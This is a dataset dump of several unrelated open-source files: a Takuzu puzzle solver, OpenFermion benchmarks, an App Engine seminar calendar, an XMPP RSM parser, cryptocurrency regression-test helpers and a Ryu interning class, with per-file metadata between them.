Args:
hilbert_space_dimension: Dimension of the Hilbert space on which the
quantum circuits acts.
probabilities: Empirical probabilities of bitstrings observed in
experiment.
Returns:
Estimate of the purity of the state resulting from the experimental
implementation of a quantum circuit.
"""
D = hilbert_space_dimension
porter_thomas_variance = (D - 1) / (D + 1) / D ** 2
return np.var(probabilities) / porter_thomas_variance
| apache-2.0 | 758,926,273,269,246,500 | 38.532258 | 79 | 0.707874 | false |
ActiveState/code | recipes/Python/578414_Takuzu_solver/recipe-578414.py | 1 | 4263 | # Copyright 2013 Eviatar Bach, [email protected]
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Implementation of a Takuzu solver.
A Takuzu board consists of a square grid of binary cells. There must be an
equal number of 0s and 1s in every row and column, no duplicate rows or
columns, and no more than two of the same bit consecutive in every row and
column.
"""
from constraint_solver import pywrapcp
N = None
BOARD1 = [[N, 1, N, 0],
[N, N, 0, N],
[N, 0, N, N],
[1, 1, N, 0]]
BOARD2 = [[N, 1, N, N, N, 0],
[1, N, N, N, N, 1],
[N, N, 0, N, N, N],
[1, N, N, N, N, N],
[N, N, N, 0, N, 0],
[N, N, N, N, 1, N]]
BOARD3 = [[N, N, N, 1, N, N, N, N, N, N],
[N, 0, N, N, N, 0, N, N, N, 1],
[1, N, 1, 1, N, N, N, 1, N, N],
[N, N, N, N, N, 0, N, N, N, N],
[N, 1, N, N, N, N, N, N, 0, N],
[0, N, N, N, 0, N, N, N, 0, N],
[N, 1, N, N, N, 0, N, N, N, N],
[1, N, N, N, 1, N, 1, N, N, N],
[1, 1, N, 0, N, N, N, N, N, N],
[N, N, N, N, N, N, N, 1, N, N]]
def valid(board):
'''
Checks whether a board has no duplicate rows or columns. This is needed to
filter out invalid solutions from the constraint solver.
'''
return ((len(set(map(tuple, board))) == len(board)) and
(len(set(zip(*board))) == len(board)))
def solve(board):
'''
Solves a Takuzu board, with None for empty (unsolved) spaces
'''
assert len(set(map(len, board))) == 1 # all row lengths are the same
assert len(board) == len(board[0]) # width and height are the same
assert len(board) % 2 == 0 # board has even dimensions
line_sum = len(board) / 2 # the number to which all rows and columns sum
line = range(len(board)) # line and row indices
solver = pywrapcp.Solver('takuzu')
grid = {}
for i in line:
for j in line:
grid[(i, j)] = solver.IntVar(0, 1, 'grid %i %i' % (i, j))
# initial values
for i in line:
for j in line:
if board[i][j] is not None:
solver.Add(grid[(i, j)] == board[i][j])
# no three consecutive elements in rows or columns
for i in line:
for j in range(len(board) - 2):
solver.Add(solver.SumGreaterOrEqual([grid[(i, jl)]
for jl in line[j:j + 3]], 1))
solver.Add(solver.SumLessOrEqual([grid[(i, jl)]
for jl in line[j:j + 3]], 2))
solver.Add(solver.SumGreaterOrEqual([grid[(jl, i)]
for jl in line[j:j + 3]], 1))
solver.Add(solver.SumLessOrEqual([grid[(jl, i)]
for jl in line[j:j + 3]], 2))
# rows and columns sum to half the size
for i in line:
solver.Add(solver.SumEquality([grid[(i, j)] for j in line], line_sum))
for j in line:
solver.Add(solver.SumEquality([grid[(i, j)] for i in line], line_sum))
# regroup all variables into a list
all_vars = [grid[(i, j)] for i in line for j in line]
# create search phases
vars_phase = solver.Phase(all_vars,
solver.INT_VAR_SIMPLE,
solver.INT_VALUE_SIMPLE)
# search for all solutions and remove those with duplicate rows or columns
solver.NewSearch(vars_phase)
solutions = []
while solver.NextSolution():
solutions.append([[int(grid[(i, j)].Value()) for j in line]
for i in line])
solver.EndSearch()
solutions = filter(valid, solutions)
assert len(solutions) == 1 # there should be only one solution
return solutions[0]
for row in solve(BOARD3):
print row
| mit | -8,761,855,008,896,713,000 | 31.792308 | 78 | 0.553366 | false |
quantumlib/OpenFermion | src/openfermion/testing/performance_benchmarks.py | 1 | 11534 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This file contains tests of code performance to reveal bottlenecks."""
import time
import logging
import numpy
from openfermion.utils import commutator, Grid
from openfermion.ops import FermionOperator, QubitOperator
from openfermion.hamiltonians import jellium_model
from openfermion.transforms.opconversions import (jordan_wigner,
get_fermion_operator,
normal_ordered)
from openfermion.linalg import (jordan_wigner_sparse,
LinearQubitOperatorOptions, LinearQubitOperator,
ParallelLinearQubitOperator)
from openfermion.testing.testing_utils import random_interaction_operator
from openfermion.transforms import \
commutator_ordered_diagonal_coulomb_with_two_body_operator
def benchmark_molecular_operator_jordan_wigner(n_qubits):
"""Test speed with which molecular operators transform to qubit operators.
Args:
n_qubits: The size of the molecular operator instance. Ideally, we
would be able to transform to a qubit operator for 50 qubit
instances in less than a minute. We are way too slow right now.
Returns:
runtime: The number of seconds required to make the conversion.
"""
# Get an instance of InteractionOperator.
molecular_operator = random_interaction_operator(n_qubits)
# Convert to a qubit operator.
start = time.time()
_ = jordan_wigner(molecular_operator)
end = time.time()
# Return runtime.
runtime = end - start
return runtime
def benchmark_fermion_math_and_normal_order(n_qubits, term_length, power):
"""Benchmark both arithmetic operators and normal ordering on fermions.
The idea is we generate two random FermionTerms, A and B, each acting
on n_qubits with term_length operators. We then compute
(A + B) ** power. This is costly that is the first benchmark. The second
benchmark is in normal ordering whatever comes out.
Args:
n_qubits: The number of qubits on which these terms act.
term_length: The number of operators in each term.
power: Int, the exponent to which to raise sum of the two terms.
Returns:
runtime_math: The time it takes to perform (A + B) ** power
runtime_normal_order: The time it takes to perform
FermionOperator.normal_order()
"""
# Generate random operator strings.
operators_a = [(numpy.random.randint(n_qubits), numpy.random.randint(2))]
operators_b = [(numpy.random.randint(n_qubits), numpy.random.randint(2))]
for _ in range(term_length):
# Make sure the operator is not trivially zero.
operator_a = (numpy.random.randint(n_qubits), numpy.random.randint(2))
while operator_a == operators_a[-1]:
operator_a = (numpy.random.randint(n_qubits),
numpy.random.randint(2))
operators_a += [operator_a]
# Do the same for the other operator.
operator_b = (numpy.random.randint(n_qubits), numpy.random.randint(2))
while operator_b == operators_b[-1]:
operator_b = (numpy.random.randint(n_qubits),
numpy.random.randint(2))
operators_b += [operator_b]
# Initialize FermionTerms and then sum them together.
fermion_term_a = FermionOperator(tuple(operators_a),
float(numpy.random.randn()))
fermion_term_b = FermionOperator(tuple(operators_b),
float(numpy.random.randn()))
fermion_operator = fermion_term_a + fermion_term_b
# Exponentiate.
start_time = time.time()
fermion_operator **= power
runtime_math = time.time() - start_time
# Normal order.
start_time = time.time()
normal_ordered(fermion_operator)
runtime_normal_order = time.time() - start_time
# Return.
return runtime_math, runtime_normal_order
def benchmark_jordan_wigner_sparse(n_qubits):
"""Benchmark the speed at which a FermionOperator is mapped to a matrix.
Args:
n_qubits: The number of qubits in the example.
Returns:
runtime: The time in seconds that the benchmark took.
"""
# Initialize a random FermionOperator.
molecular_operator = random_interaction_operator(n_qubits)
fermion_operator = get_fermion_operator(molecular_operator)
# Map to SparseOperator class.
start_time = time.time()
_ = jordan_wigner_sparse(fermion_operator)
runtime = time.time() - start_time
return runtime
def benchmark_linear_qubit_operator(n_qubits, n_terms, processes=None):
"""Test speed with getting a linear operator from a Qubit Operator.
Args:
n_qubits: The number of qubits, implying the dimension of the operator
is 2 ** n_qubits.
n_terms: The number of terms in a qubit operator.
processes: The number of processors to use.
Returns:
runtime_operator: The time it takes to get the linear operator.
runtime_matvec: The time it takes to perform matrix multiplication.
"""
# Generates Qubit Operator with specified number of terms.
map_int_to_operator = {
0: 'X',
1: 'Y',
2: 'Z',
}
qubit_operator = QubitOperator.zero()
for _ in range(n_terms):
tuples = []
for i in range(n_qubits):
operator = numpy.random.randint(4)
# 3 is 'I', so just skip.
if operator > 2:
continue
tuples.append((i, map_int_to_operator[operator]))
if tuples:
qubit_operator += QubitOperator(tuples, 1.00)
# Gets an instance of (Parallel)LinearQubitOperator.
start = time.time()
if processes is None:
linear_operator = LinearQubitOperator(qubit_operator, n_qubits)
else:
linear_operator = ParallelLinearQubitOperator(
qubit_operator, n_qubits,
LinearQubitOperatorOptions(processes=processes))
end = time.time()
runtime_operator = end - start
vec = numpy.random.rand(2**n_qubits)
# Performs matrix multiplication.
start = time.time()
_ = linear_operator * vec
end = time.time()
runtime_matvec = end - start
return runtime_operator, runtime_matvec
def benchmark_commutator_diagonal_coulomb_operators_2D_spinless_jellium(
side_length):
"""Test speed of computing commutators using specialized functions.
Args:
side_length: The side length of the 2D jellium grid. There are
side_length ** 2 qubits, and O(side_length ** 4) terms in the
Hamiltonian.
Returns:
runtime_commutator: The time it takes to compute a commutator, after
partitioning the terms and normal ordering, using the regular
commutator function.
runtime_diagonal_commutator: The time it takes to compute the same
commutator using methods restricted to diagonal Coulomb operators.
"""
hamiltonian = normal_ordered(
jellium_model(Grid(2, side_length, 1.), plane_wave=False))
part_a = FermionOperator.zero()
part_b = FermionOperator.zero()
add_to_a_or_b = 0 # add to a if 0; add to b if 1
for term, coeff in hamiltonian.terms.items():
# Partition terms in the Hamiltonian into part_a or part_b
if add_to_a_or_b:
part_a += FermionOperator(term, coeff)
else:
part_b += FermionOperator(term, coeff)
add_to_a_or_b ^= 1
start = time.time()
_ = normal_ordered(commutator(part_a, part_b))
end = time.time()
runtime_commutator = end - start
start = time.time()
_ = commutator_ordered_diagonal_coulomb_with_two_body_operator(
part_a, part_b)
end = time.time()
runtime_diagonal_commutator = end - start
return runtime_commutator, runtime_diagonal_commutator
# Sets up each benchmark run.
def run_molecular_operator_jordan_wigner(n_qubits=18):
"""Run InteractionOperator.jordan_wigner_transform() benchmark."""
logging.info('Starting test on '
'InteractionOperator.jordan_wigner_transform()')
logging.info('n_qubits = %d.', n_qubits)
runtime = benchmark_molecular_operator_jordan_wigner(n_qubits)
logging.info(
'InteractionOperator.jordan_wigner_transform() takes %f '
'seconds.\n', runtime)
return runtime
def run_fermion_math_and_normal_order(n_qubits=20, term_length=10, power=15):
"""Run benchmark on FermionOperator math and normal-ordering."""
logging.info('Starting test on FermionOperator math and normal ordering.')
logging.info('(n_qubits, term_length, power) = (%d, %d, %d).', n_qubits,
term_length, power)
runtime_math, runtime_normal = benchmark_fermion_math_and_normal_order(
n_qubits, term_length, power)
logging.info('Math took %f seconds. Normal ordering took %f seconds.\n',
runtime_math, runtime_normal)
return runtime_math, runtime_normal
def run_jordan_wigner_sparse(n_qubits=10):
"""Run FermionOperator.jordan_wigner_sparse() benchmark."""
logging.info('Starting test on FermionOperator.jordan_wigner_sparse().')
logging.info('n_qubits = %d.', n_qubits)
runtime = benchmark_jordan_wigner_sparse(n_qubits)
logging.info('Construction of SparseOperator took %f seconds.\n', runtime)
return runtime
def run_linear_qubit_operator(n_qubits=16, n_terms=10, processes=10):
"""Run linear_qubit_operator benchmark."""
logging.info('Starting test on linear_qubit_operator().')
logging.info('(n_qubits, n_terms) = (%d, %d).', n_qubits, n_terms)
_, runtime_sequential = benchmark_linear_qubit_operator(n_qubits, n_terms)
_, runtime_parallel = benchmark_linear_qubit_operator(
n_qubits, n_terms, processes)
logging.info(
'LinearQubitOperator took %f seconds, while '
'ParallelQubitOperator took %f seconds with %d processes, '
'and ratio is %.2f.\n', runtime_sequential, runtime_parallel, processes,
runtime_sequential / runtime_parallel)
return runtime_sequential, runtime_parallel
def run_diagonal_commutator(side_length=4):
"""Run commutator_diagonal_coulomb_operators benchmark."""
logging.info(
'Starting test on '
'commutator_ordered_diagonal_coulomb_with_two_body_operator().')
runtime_commutator, runtime_diagonal_commutator = (
benchmark_commutator_diagonal_coulomb_operators_2D_spinless_jellium(
side_length=side_length))
logging.info(
'Regular commutator computation took %f seconds, while '
'commutator_ordered_diagonal_coulomb_with_two_body_operator'
' took %f seconds. Ratio is %.2f.\n', runtime_commutator,
runtime_diagonal_commutator,
runtime_commutator / runtime_diagonal_commutator)
return runtime_commutator, runtime_diagonal_commutator
| apache-2.0 | -912,830,139,320,243,600 | 37.446667 | 80 | 0.661869 | false |
vbraun/oxford-strings | app/calendar_view.py | 1 | 6003 | # -*- coding: utf-8 -*-
"""
Calendaring Page Views
"""
import sys
import os
import uuid
import logging
from datetime import date, datetime, timedelta
from webapp2 import uri_for
from google.appengine.api import users
import app.config as config
from app.base_view import RequestHandler
from app.decorators import cached_property, requires_login, requires_admin
from app.event_model import Event
class CalendarAdmin(RequestHandler):
def get_events(self):
"""
Return all future events
"""
now = datetime.combine(date.today(), datetime.min.time())
return Event.query(Event.start_date >= now).order(Event.start_date).fetch(100)
def get(self):
self.cache_must_revalidate()
values = dict()
values['sync_url'] = uri_for('cron-sync')
values['full_url'] = uri_for('calendar-admin')
values['calendar_admin_url'] = self.request.uri
values['calendar'] = self.get_events()
self.render_response('calendar_admin.html', **values)
@requires_admin
def post(self):
key_id = self.request.get('key_id')
active = (self.request.get('active') == u'true')
ev = Event.get_by_id(int(key_id))
ev.active = active
ev.put()
class EventListing(RequestHandler):
def get_events(self):
"""
Return all future events
"""
now = datetime.combine(date.today(), datetime.min.time())
query = Event.query(Event.start_date >= now, Event.active == True)
return query.order(Event.start_date).fetch(100)
def get_template(self):
raise NotImplementedError
def get(self):
self.cache_must_revalidate()
values = dict()
# values['edit_url'] = uri_for('calendar-new')
values['sync_url'] = uri_for('cron-sync')
values['calendar_admin_url'] = uri_for('calendar-admin')
values['calendar'] = self.get_events()
values['abstract_intro'] = config.abstract_intro
self.render_response(self.get_template(), **values)
self.response.md5_etag()
class IcalExport(EventListing):
def _ical_time(self, dt):
import pytz
import time
dt = pytz.utc.localize(dt)
return time.strftime('%Y%m%dT%H%M%SZ', dt.timetuple())
def get(self):
from icalendar import Calendar, Event, vCalAddress, vText
cal = Calendar()
cal.add('prodid', '-//Strings Oxford Calendaring//strings.ox.ac.uk//')
cal.add('version', '2.0')
cal.add('X-WR-CALNAME', 'Strings Oxford')
for ev in self.get_events():
event = Event()
event['uid'] = vText(ev.uid)
event['location'] = vText(ev.location)
event['summary'] = ev.title
event['dtstart'] = self._ical_time(ev.start_date)
event['dtend'] = self._ical_time(ev.end_date)
desc = u'Speaker: {}\n'.format(ev.speaker)
desc += u'Location: {}\n'.format(ev.location)
desc += u'Series: {}\n'.format(ev.series)
desc += ev.description
event['description'] = vText(desc)
cal.add_component(event)
#self.response.headers['Content-Type'] = 'text/plain'
self.response.headers['Content-Type'] = 'text/calendar'
self.response.write(cal.to_ical())
class Seminars(EventListing):
def get_template(self):
return 'calendar.html'
class JuniorSeminar(EventListing):
def get_events(self):
"""
Return all future events in the string theory junior seminar series
"""
now = datetime.combine(date.today(), datetime.min.time())
query = Event.query(
Event.series == 'Strings Junior Seminar',
Event.start_date >= now,
Event.active == True)
return query.order(Event.start_date).fetch(100)
def get_template(self):
return 'junior_seminar.html'
class ThisWeek(EventListing):
def get_template(self):
return 'this_week.html'
def get_start_date(self):
"""
Return the date of the last Saturday
"""
today = date.today()
# today.weekday in {0, ..., 6} switches to "0" on Monday
key_day = today + timedelta(days=2) # we want to switch calendar on saturday
return today - timedelta(days=key_day.weekday())
def get_events(self):
last_saturday = self.get_start_date()
next_saturday = last_saturday + timedelta(weeks=1)
t0 = datetime.combine(last_saturday, datetime.min.time())
t1 = datetime.combine(next_saturday, datetime.max.time())
# allow for week-spanning events would be ideally:
# query = Event.query(Event.start_date <= t1, Event.end_date >= t0)
# but inequality queries can currently be only on one property
query = Event.query(
Event.start_date >= t0,
Event.start_date < t1,
Event.active == True)
return query.order(Event.start_date).fetch(100)
class NextWeek(ThisWeek):
def get_template(self):
return 'next_week.html'
def get_start_date(self):
"""
Return the date of the next Saturday
"""
return ThisWeek.get_start_date(self) + timedelta(weeks=1)
class ThisWeekEmail(ThisWeek):
def get_template(self):
return 'this_week_email.html'
class CalendarEdit(EventListing):
"""
TODO: do we really want to edit events ourselves?
"""
def get_event(self, key_id):
if key_id is not None:
return Event.get_by_id(int(key_id))
uid = str(uuid.uuid4())
ev = Event(uid=uid, editable=True, active=True)
ev.start_date = datetime.utcnow()
ev.end_date = datetime.utcnow()
ev.put()
return ev
def get(self, uid=None):
values = dict()
values['calendar'] = [self.get_event(uid)]
self.render_response('calendar.html', **values)
| gpl-2.0 | 2,358,411,222,917,641,000 | 28.717822 | 86 | 0.596702 | false |
gajim/python-nbxmpp | nbxmpp/modules/rsm.py | 1 | 1846 | # Copyright (C) 2020 Philipp Hörist <philipp AT hoerist.com>
#
# This file is part of nbxmpp.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; If not, see <http://www.gnu.org/licenses/>.
from nbxmpp.namespaces import Namespace
from nbxmpp.structs import RSMData
def parse_rsm(stanza):
stanza = stanza.getTag('set', namespace=Namespace.RSM)
if stanza is None:
return None
after = stanza.getTagData('after') or None
before = stanza.getTagData('before') or None
last = stanza.getTagData('last') or None
first_index = None
first = stanza.getTagData('first') or None
if first is not None:
try:
first_index = int(first.getAttr('index'))
except Exception:
pass
try:
count = int(stanza.getTagData('count'))
except Exception:
count = None
try:
max_ = int(stanza.getTagData('max'))
except Exception:
max_ = None
try:
index = int(stanza.getTagData('index'))
except Exception:
index = None
return RSMData(after=after,
before=before,
last=last,
first=first,
first_index=first_index,
count=count,
max=max_,
index=index)
| gpl-3.0 | 1,084,813,893,102,950,700 | 29.245902 | 70 | 0.635772 | false |
GreenCoinX/greencoin | qa/rpc-tests/util.py | 1 | 12392 | # Copyright (c) 2014 The GreenCoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Helpful routines for regression testing
#
# Add python-greencoinrpc to module search path:
import os
import sys
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), "python-greencoinrpc"))
from decimal import Decimal, ROUND_DOWN
import json
import random
import shutil
import subprocess
import time
import re
from greencoinrpc.authproxy import AuthServiceProxy, JSONRPCException
from util import *
def p2p_port(n):
return 11000 + n + os.getpid()%999
def rpc_port(n):
return 12000 + n + os.getpid()%999
def check_json_precision():
"""Make sure json library being used does not lose precision converting XGC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n)))*1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def sync_blocks(rpc_connections):
"""
Wait until everybody has the same block count
"""
while True:
counts = [ x.getblockcount() for x in rpc_connections ]
if counts == [ counts[0] ]*len(counts):
break
time.sleep(1)
def sync_mempools(rpc_connections):
"""
Wait until everybody has the same transactions in their memory
pools
"""
while True:
pool = set(rpc_connections[0].getrawmempool())
num_match = 1
for i in range(1, len(rpc_connections)):
if set(rpc_connections[i].getrawmempool()) == pool:
num_match = num_match+1
if num_match == len(rpc_connections):
break
time.sleep(1)
greencoind_processes = {}
def initialize_datadir(dirname, n):
datadir = os.path.join(dirname, "node"+str(n))
if not os.path.isdir(datadir):
os.makedirs(datadir)
with open(os.path.join(datadir, "greencoin.conf"), 'w') as f:
f.write("regtest=1\n");
f.write("rpcuser=rt\n");
f.write("rpcpassword=rt\n");
f.write("port="+str(p2p_port(n))+"\n");
f.write("rpcport="+str(rpc_port(n))+"\n");
return datadir
def initialize_chain(test_dir):
"""
Create (or copy from cache) a 200-block-long chain and
4 wallets.
greencoind and greencoin-cli must be in search path.
"""
if not os.path.isdir(os.path.join("cache", "node0")):
devnull = open("/dev/null", "w+")
# Create cache directories, run greencoinds:
for i in range(4):
datadir=initialize_datadir("cache", i)
args = [ os.getenv("GREENCOIND", "greencoind"), "-keypool=1", "-datadir="+datadir, "-discover=0" ]
if i > 0:
args.append("-connect=127.0.0.1:"+str(p2p_port(0)))
greencoind_processes[i] = subprocess.Popen(args)
subprocess.check_call([ os.getenv("GREENCOINCLI", "greencoin-cli"), "-datadir="+datadir,
"-rpcwait", "getblockcount"], stdout=devnull)
devnull.close()
rpcs = []
for i in range(4):
try:
url = "http://rt:[email protected]:%d"%(rpc_port(i),)
rpcs.append(AuthServiceProxy(url))
except:
sys.stderr.write("Error connecting to "+url+"\n")
sys.exit(1)
# Create a 200-block-long chain; each of the 4 nodes
# gets 25 mature blocks and 25 immature.
# blocks are created with timestamps 10 minutes apart, starting
# at 1 Jan 2014
block_time = 1388534400
for i in range(2):
for peer in range(4):
for j in range(25):
set_node_times(rpcs, block_time)
rpcs[peer].setgenerate(True, 1)
block_time += 10*60
# Must sync before next peer starts generating blocks
sync_blocks(rpcs)
# Shut them down, and clean up cache directories:
stop_nodes(rpcs)
wait_greencoinds()
for i in range(4):
os.remove(log_filename("cache", i, "debug.log"))
os.remove(log_filename("cache", i, "db.log"))
os.remove(log_filename("cache", i, "peers.dat"))
os.remove(log_filename("cache", i, "fee_estimates.dat"))
for i in range(4):
from_dir = os.path.join("cache", "node"+str(i))
to_dir = os.path.join(test_dir, "node"+str(i))
shutil.copytree(from_dir, to_dir)
initialize_datadir(test_dir, i) # Overwrite port/rpcport in greencoin.conf
def initialize_chain_clean(test_dir, num_nodes):
"""
Create an empty blockchain and num_nodes wallets.
Useful if a test case wants complete control over initialization.
"""
for i in range(num_nodes):
datadir=initialize_datadir(test_dir, i)
def _rpchost_to_args(rpchost):
'''Convert optional IP:port spec to rpcconnect/rpcport args'''
if rpchost is None:
return []
match = re.match('(\[[0-9a-fA-f:]+\]|[^:]+)(?::([0-9]+))?$', rpchost)
if not match:
raise ValueError('Invalid RPC host spec ' + rpchost)
rpcconnect = match.group(1)
rpcport = match.group(2)
if rpcconnect.startswith('['): # remove IPv6 [...] wrapping
rpcconnect = rpcconnect[1:-1]
rv = ['-rpcconnect=' + rpcconnect]
if rpcport:
rv += ['-rpcport=' + rpcport]
return rv
def start_node(i, dirname, extra_args=None, rpchost=None):
"""
Start a greencoind and return RPC connection to it
"""
datadir = os.path.join(dirname, "node"+str(i))
args = [ os.getenv("GREENCOIND", "greencoind"), "-datadir="+datadir, "-keypool=1", "-discover=0", "-rest" ]
if extra_args is not None: args.extend(extra_args)
greencoind_processes[i] = subprocess.Popen(args)
devnull = open("/dev/null", "w+")
subprocess.check_call([ os.getenv("GREENCOINCLI", "greencoin-cli"), "-datadir="+datadir] +
_rpchost_to_args(rpchost) +
["-rpcwait", "getblockcount"], stdout=devnull)
devnull.close()
url = "http://rt:rt@%s:%d" % (rpchost or '127.0.0.1', rpc_port(i))
proxy = AuthServiceProxy(url)
proxy.url = url # store URL on proxy for info
return proxy
def start_nodes(num_nodes, dirname, extra_args=None, rpchost=None):
"""
Start multiple greencoinds, return RPC connections to them
"""
if extra_args is None: extra_args = [ None for i in range(num_nodes) ]
return [ start_node(i, dirname, extra_args[i], rpchost) for i in range(num_nodes) ]
def log_filename(dirname, n_node, logname):
return os.path.join(dirname, "node"+str(n_node), "regtest", logname)
def stop_node(node, i):
node.stop()
greencoind_processes[i].wait()
del greencoind_processes[i]
def stop_nodes(nodes):
for node in nodes:
node.stop()
del nodes[:] # Emptying array closes connections as a side effect
def set_node_times(nodes, t):
for node in nodes:
node.setmocktime(t)
def wait_greencoinds():
# Wait for all greencoinds to cleanly exit
for greencoind in greencoind_processes.values():
greencoind.wait()
greencoind_processes.clear()
def connect_nodes(from_connection, node_num):
ip_port = "127.0.0.1:"+str(p2p_port(node_num))
from_connection.addnode(ip_port, "onetry")
# poll until version handshake complete to avoid race conditions
# with transaction relaying
while any(peer['version'] == 0 for peer in from_connection.getpeerinfo()):
time.sleep(0.1)
def connect_nodes_bi(nodes, a, b):
connect_nodes(nodes[a], b)
connect_nodes(nodes[b], a)
def find_output(node, txid, amount):
"""
Return index to output of txid with value amount
Raises exception if there is none.
"""
txdata = node.getrawtransaction(txid, 1)
for i in range(len(txdata["vout"])):
if txdata["vout"][i]["value"] == amount:
return i
raise RuntimeError("find_output txid %s : %s not found"%(txid,str(amount)))
def gather_inputs(from_node, amount_needed, confirmations_required=1):
"""
Return a random set of unspent txouts that are enough to pay amount_needed
"""
assert(confirmations_required >=0)
utxo = from_node.listunspent(confirmations_required)
random.shuffle(utxo)
inputs = []
total_in = Decimal("0.00000000")
while total_in < amount_needed and len(utxo) > 0:
t = utxo.pop()
total_in += t["amount"]
inputs.append({ "txid" : t["txid"], "vout" : t["vout"], "address" : t["address"] } )
if total_in < amount_needed:
raise RuntimeError("Insufficient funds: need %d, have %d"%(amount_needed, total_in))
return (total_in, inputs)
def make_change(from_node, amount_in, amount_out, fee):
"""
Create change output(s), return them
"""
outputs = {}
amount = amount_out+fee
change = amount_in - amount
if change > amount*2:
# Create an extra change output to break up big inputs
change_address = from_node.getnewaddress()
# Split change in two, being careful of rounding:
outputs[change_address] = Decimal(change/2).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
change = amount_in - amount - outputs[change_address]
if change > 0:
outputs[from_node.getnewaddress()] = change
return outputs
def send_zeropri_transaction(from_node, to_node, amount, fee):
"""
Create&broadcast a zero-priority transaction.
Returns (txid, hex-encoded-txdata)
Ensures transaction is zero-priority by first creating a send-to-self,
then using it's output
"""
# Create a send-to-self with confirmed inputs:
self_address = from_node.getnewaddress()
(total_in, inputs) = gather_inputs(from_node, amount+fee*2)
outputs = make_change(from_node, total_in, amount+fee, fee)
outputs[self_address] = float(amount+fee)
self_rawtx = from_node.createrawtransaction(inputs, outputs)
self_signresult = from_node.signrawtransaction(self_rawtx)
self_txid = from_node.sendrawtransaction(self_signresult["hex"], True)
vout = find_output(from_node, self_txid, amount+fee)
# Now immediately spend the output to create a 1-input, 1-output
# zero-priority transaction:
inputs = [ { "txid" : self_txid, "vout" : vout } ]
outputs = { to_node.getnewaddress() : float(amount) }
rawtx = from_node.createrawtransaction(inputs, outputs)
signresult = from_node.signrawtransaction(rawtx)
txid = from_node.sendrawtransaction(signresult["hex"], True)
return (txid, signresult["hex"])
def random_zeropri_transaction(nodes, amount, min_fee, fee_increment, fee_variants):
"""
Create a random zero-priority transaction.
Returns (txid, hex-encoded-transaction-data, fee)
"""
from_node = random.choice(nodes)
to_node = random.choice(nodes)
fee = min_fee + fee_increment*random.randint(0,fee_variants)
(txid, txhex) = send_zeropri_transaction(from_node, to_node, amount, fee)
return (txid, txhex, fee)
def random_transaction(nodes, amount, min_fee, fee_increment, fee_variants):
"""
Create a random transaction.
Returns (txid, hex-encoded-transaction-data, fee)
"""
from_node = random.choice(nodes)
to_node = random.choice(nodes)
fee = min_fee + fee_increment*random.randint(0,fee_variants)
(total_in, inputs) = gather_inputs(from_node, amount+fee)
outputs = make_change(from_node, total_in, amount, fee)
outputs[to_node.getnewaddress()] = float(amount)
rawtx = from_node.createrawtransaction(inputs, outputs)
signresult = from_node.signrawtransaction(rawtx)
txid = from_node.sendrawtransaction(signresult["hex"], True)
return (txid, signresult["hex"], fee)
def assert_equal(thing1, thing2):
if thing1 != thing2:
raise AssertionError("%s != %s"%(str(thing1),str(thing2)))
def assert_greater_than(thing1, thing2):
if thing1 <= thing2:
raise AssertionError("%s <= %s"%(str(thing1),str(thing2)))
def assert_raises(exc, fun, *args, **kwds):
try:
fun(*args, **kwds)
except exc:
pass
except Exception as e:
raise AssertionError("Unexpected exception raised: "+type(e).__name__)
else:
raise AssertionError("No exception raised")
| mit | -4,516,492,325,348,073,500 | 35.12828 | 111 | 0.632021 | false |
Zouyiran/ryu | ryu/services/protocols/bgp/utils/internable.py | 1 | 3260 | # Copyright (C) 2014 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import weakref
from six.moves import intern
dict_name = intern('_internable_dict')
#
# Internable
#
class Internable(object):
"""Class that allows instances to be 'interned'. That is, given an
instance of this class, one can obtain a canonical (interned)
copy.
This saves memory when there are likely to be many identical
instances of the class -- users hold references to a single
interned object instead of references to different objects that
are identical.
The interned version of a given instance is created on demand if
necessary, and automatically cleaned up when nobody holds a
reference to it.
Instances of sub-classes must be usable as dictionary keys for
Internable to work.
"""
class Stats(object):
def __init__(self):
self.d = {}
def incr(self, name):
self.d[name] = self.d.get(name, 0) + 1
def __repr__(self):
return repr(self.d)
def __str__(self):
return str(self.d)
@classmethod
def _internable_init(kls):
# Objects to be interned are held as keys in a dictionary that
# only holds weak references to keys. As a result_backup, when the
# last reference to an interned object goes away, the object
# will be removed from the dictionary.
kls._internable_dict = weakref.WeakKeyDictionary()
kls._internable_stats = Internable.Stats()
@classmethod
def intern_stats(kls):
return kls._internable_stats
def intern(self):
"""Returns either itself or a canonical copy of itself."""
# If this is an interned object, return it
if hasattr(self, '_interned'):
return self._internable_stats.incr('self')
#
# Got to find or create an interned object identical to this
# one. Auto-initialize the class if need be.
#
kls = self.__class__
if not hasattr(kls, dict_name):
kls._internable_init()
obj = kls._internable_dict.get(self)
if (obj):
# Found an interned copy.
kls._internable_stats.incr('found')
return obj
